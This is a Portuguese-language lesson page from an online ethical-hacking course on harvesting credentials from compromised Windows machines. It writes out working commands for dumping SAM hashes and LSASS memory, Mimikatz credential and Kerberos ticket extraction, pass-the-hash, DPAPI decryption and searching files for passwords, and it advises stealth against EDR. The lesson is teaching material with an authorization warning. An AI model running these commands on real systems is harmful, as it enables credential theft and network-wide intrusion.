Coleta de credenciais
Extraia segredos
Coleta de credenciais é uma aula grátis de Ethical Hacking Academy no CoddyKit. Esta é a aula 4 de 4. Você pode ler a aula completa abaixo gratuitamente — depois pratica ao vivo no navegador com um editor de código integrado e um tutor de IA 24/7. Faz parte do caminho de aprendizado de Ethical Hacking Academy, e seu progresso é sincronizado entre a web e o app CoddyKit. O curso de Ethical Hacking Academy inclui 4 aulas no total.
Por que coletar credenciais?
Mesmo depois de alcançar SYSTEM, o verdadeiro prêmio costuma ser constituído pelas credenciais — hashes de senhas, senhas em texto simples e tíquetes que permitem mover-se lateralmente e alcançar o domínio. A coleta de credenciais transforma uma máquina em toda a rede.
O banco de dados SAM
Os hashes das contas locais ficam na seção de registro SAM, criptografados com uma chave na seção SYSTEM. Com acesso SYSTEM, você pode despejar ambas e extrair hashes NTLM off-line.
reg save HKLM\SAM sam.save
reg save HKLM\SYSTEM system.save
# then: secretsdump.py -sam sam.save -system system.save LOCALMemória do LSASS
O processo LSASS mantém na memória as credenciais dos usuários conectados — frequentemente incluindo texto simples ou hashes NTLM reutilizáveis e tíquetes Kerberos. Despejar o LSASS é a ação de maior valor na coleta.
rundll32 comsvcs.dll, MiniDump <lsass_pid> C:\Temp\lsass.dmp fullMimikatz
Mimikatz é a ferramenta clássica de extração de credenciais. sekurlsa::logonpasswords obtém credenciais do LSASS; ela também pode extrair tíquetes, realizar pass-the-hash e despejar o SAM.
privilege::debug
sekurlsa::logonpasswords
lsadump::samPass-the-Hash
Frequentemente, você não precisa quebrar um hash — o pass-the-hash autentica usando diretamente o hash NTLM. É por isso que despejar hashes basta para mover-se lateralmente entre máquinas que compartilham credenciais de administrador local.
pth-winexe -U "admin%aad3b...:31d6c..." //10.0.0.6 cmd
# or evil-winrm -i host -u admin -H <NThash>Credenciais de domínio armazenadas em cache
Máquinas ingressadas no domínio armazenam em cache os últimos logins (MSCache/DCC2) para que os usuários possam iniciar sessão off-line. Esses hashes armazenados em cache podem ser despejados e quebrados off-line (lentamente), revelando senhas do domínio.
secretsdump.py -system system.save -security security.save LOCALCredenciais salvas e armazenadas
O Windows armazena credenciais no Gerenciador de Credenciais / Cofre e em blobs protegidos por DPAPI (RDP salvo, senhas de navegador e de Wi-Fi). Com SYSTEM e as chaves mestras, você pode descriptografá-los.
cmdkey /list
vaultcmd /listcreds
mimikatz: dpapi::cred /in:<blob>Roubo de tíquetes Kerberos
No Active Directory, sekurlsa::tickets do Mimikatz exporta TGTs/TGS do Kerberos. Tíquetes roubados permitem o pass-the-ticket, e um TGT de administrador do domínio pode levar à persistência por meio de Golden/Silver Ticket.
sekurlsa::tickets /exportArquivos e scripts com segredos
Não ignore as oportunidades fáceis: scripts, arquivos de configuração e históricos repletos de credenciais em texto simples. O histórico do PowerShell, arquivos de instalação autônoma e cadeias de conexão do web.config do IIS frequentemente contêm senhas.
type %APPDATA%\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
findstr /si "password connectionString" *.configLimpeza e OPSEC
O despejo do LSASS é monitorado intensamente pelo EDR, e o Defender Credential Guard pode bloqueá-lo. Em trabalhos de segurança, prefira métodos furtivos, limpe os arquivos de despejo e documente no relatório o que foi acessado.
Ética e autorização
A coleta de credenciais expõe os segredos mais sensíveis da organização. Proteja as credenciais despejadas, nunca as exfiltre para além do escopo e atue somente com autorização explícita por escrito.
Verificação rápida
Teste seus conhecimentos sobre coleta de credenciais.
Recapitulação
Você aprendeu sobre coleta de credenciais:
- Despeje o SAM para obter hashes locais; despeje o LSASS para obter usuários conectados e tíquetes
- Mimikatz extrai senhas, hashes e tíquetes Kerberos
- Pass-the-hash / pass-the-ticket permitem o movimento lateral sem quebrar hashes
- Verifique o Gerenciador de Credenciais, DPAPI e arquivos de configuração/histórico em busca de segredos
Isso conclui o curso de Escalação de Privilégios no Windows.
Perguntas Frequentes
A aula “Coleta de credenciais” é grátis?
Sim — o texto completo de “Coleta de credenciais” é grátis para ler aqui na web. Para praticá-la interativamente (um editor de código integrado e um tutor de IA 24/7) e desbloquear o restante do curso de Ethical Hacking Academy, atualize para CoddyKit PRO. O curso de Ethical Hacking Academy inclui 4 aulas no total.
O que vou aprender em “Coleta de credenciais”?
Extraia segredos Você pratica Ethical Hacking Academy com código prático que executa diretamente no navegador, e um tutor de IA 24/7 responde suas dúvidas enquanto trabalha na aula.
Preciso ter experiência prévia para começar Ethical Hacking Academy?
Nenhuma experiência prévia é necessária. Ethical Hacking Academy no CoddyKit é estruturado para alunos iniciantes até avançados, então você pode começar aqui ou desde o início e aprender no seu ritmo. Esta é a aula 4 de 4.
Quanto tempo leva a aula “Coleta de credenciais”?
A maioria das aulas CoddyKit leva cerca de 5–10 minutos. Cada uma é compacta e interativa, então você faz progresso constante e retoma exatamente de onde parou entre web e app.
Posso escrever e executar código nesta aula de Ethical Hacking Academy?
Sim. Cada aula de Ethical Hacking Academy inclui um editor de código integrado, então você escreve e executa código real direto no navegador e recebe feedback de IA instantaneamente — nenhuma configuração local necessária.
Todas as aulas deste curso
- Enumeração do Windows
- Configurações incorretas de serviços
- Personificação de tokens
- Coleta de credenciais